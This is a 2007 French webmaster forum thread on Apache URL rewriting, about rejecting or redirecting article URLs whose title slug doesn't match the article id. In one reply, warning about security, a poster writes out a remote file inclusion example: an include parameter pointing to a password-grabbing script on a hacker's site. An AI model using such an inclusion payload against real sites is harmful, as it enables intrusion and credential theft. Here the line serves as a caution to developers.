Url Rewriting et titre

Consultez la formation URL Rewriting et sites dynamiques de WebRankInfo / Ranking Metrics

alglop
WRInaute occasionnel
WRInaute occasionnel

Url Rewriting et titre

Message le Dim Fév 11, 2007 13:21

Bonjour à tous !
Je me met doucement au Url Rewriting mais je rencontre un petit problème concernant les variables.
Mon problème :
Ma page originale est article.php?id=<id de l'article>. Je voudrais réécrire l'url en ajoutant le titre de l'article (article-21-WebrankInfo.html par exemple). Pour cela, j'ai fait :
Code: Tout sélectionner
RewriteRule ^article-([0-9]+)-(.*).html$  /article.php?id=$1 [L]

Sauf qu'un visiteur peut accéder à la page même si le titre est mauvais (tant que l'id est bon).
Comment faire pour éviter ça et renvoyer une erreur 404 ?
Merci
A bientôt

fablezouave
WRInaute occasionnel
WRInaute occasionnel

Message le Dim Fév 11, 2007 14:29

salut

Est-ce vraiment important, tant que le contenu affiché est le bon ? J'en suis pas sûr ...

Sinon, il faut faire la vérification en PHP, en passant le titre de l'article à la page :
RewriteRule ^article-([0-9]+)-(.*).html$  /article.php?id=$1&titre=$2 [L]

fab

alglop
WRInaute occasionnel
WRInaute occasionnel

Message le Dim Fév 11, 2007 14:31

Donc ce n'est pas grave si ce n'est pas corrigé?
Existe t il des risques à utiliser l'Url Rewriting (niveau sécurité) ?
Merci

Leonick
WRInaute accro
WRInaute accro

Message le Dim Fév 11, 2007 14:42

tant que tu ne fais pas d'include en provenance de ton url sans vérifier. Mais c'était valable aussi sans le rewriting.
Du genre index.php?include=http://www.monsitedehack.com/recuppassword.php :twisted:

alglop
WRInaute occasionnel
WRInaute occasionnel

Message le Dim Fév 11, 2007 14:53

ok merci beaucoup !
A bientot

magic corp.
WRInaute impliqué
WRInaute impliqué

Message le Dim Fév 11, 2007 16:11

J'ai aussi été confronté à ce problème,

Personnellement, je test au chargement de la page concernée que l'URL demander (via $_SERVER['REQUEST_URI']) correspond bien à l'URL que devrait avoir la page. Si tel n'est pas le cas, je fait une redirection 301 vers la bonne URL.

$seo_name_file = "article-21-WebrankInfo.html" // Nom "théorique" que dois avoir la page. Normalement généré dynamiquement.

if(ereg('(.+\.html)[\?]?(.*)', basename($_SERVER['REQUEST_URI']), $uri)) {   
  if($seo_name_file != $uri[1]) { // Test si URL "théorique" est différente de l'URL tapé par le visiteur
    // Redirection vers "article-21-WebrankInfo.html".
  }
}

PS : Ignorer ce problème ne peut il pas conduire à du duplicate content ?

Formation recommandée sur ce thème :

Formation URL Rewriting et sites dynamiques : apprenez comment mettre en place la réécriture d'URL, comment optimiser vos URL et profiter de vos pages dynamiques pour booster votre référencement. Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :

Consultez la description détaillée des produits ou services de Google suivants : Google Local Business Ads, Google Music Search

• Calcul du nombre de backlinks
    Cet outil vous permet d'analyser en détails la "popularité" de votre site sur Google. En plus du nombre de liens pris en compte par Google, il calcule le pourcentage de liens internes parmi tous les liens, et il affiche les premières URL trouvées.
  • Transformer des citations en liens
    Cet outil vous permet de trouver des pages citant votre site mais ne faisant pas (encore) de lien. Il suffira parfois d'un simple mail pour transformer cette simple citation en lien (backlink).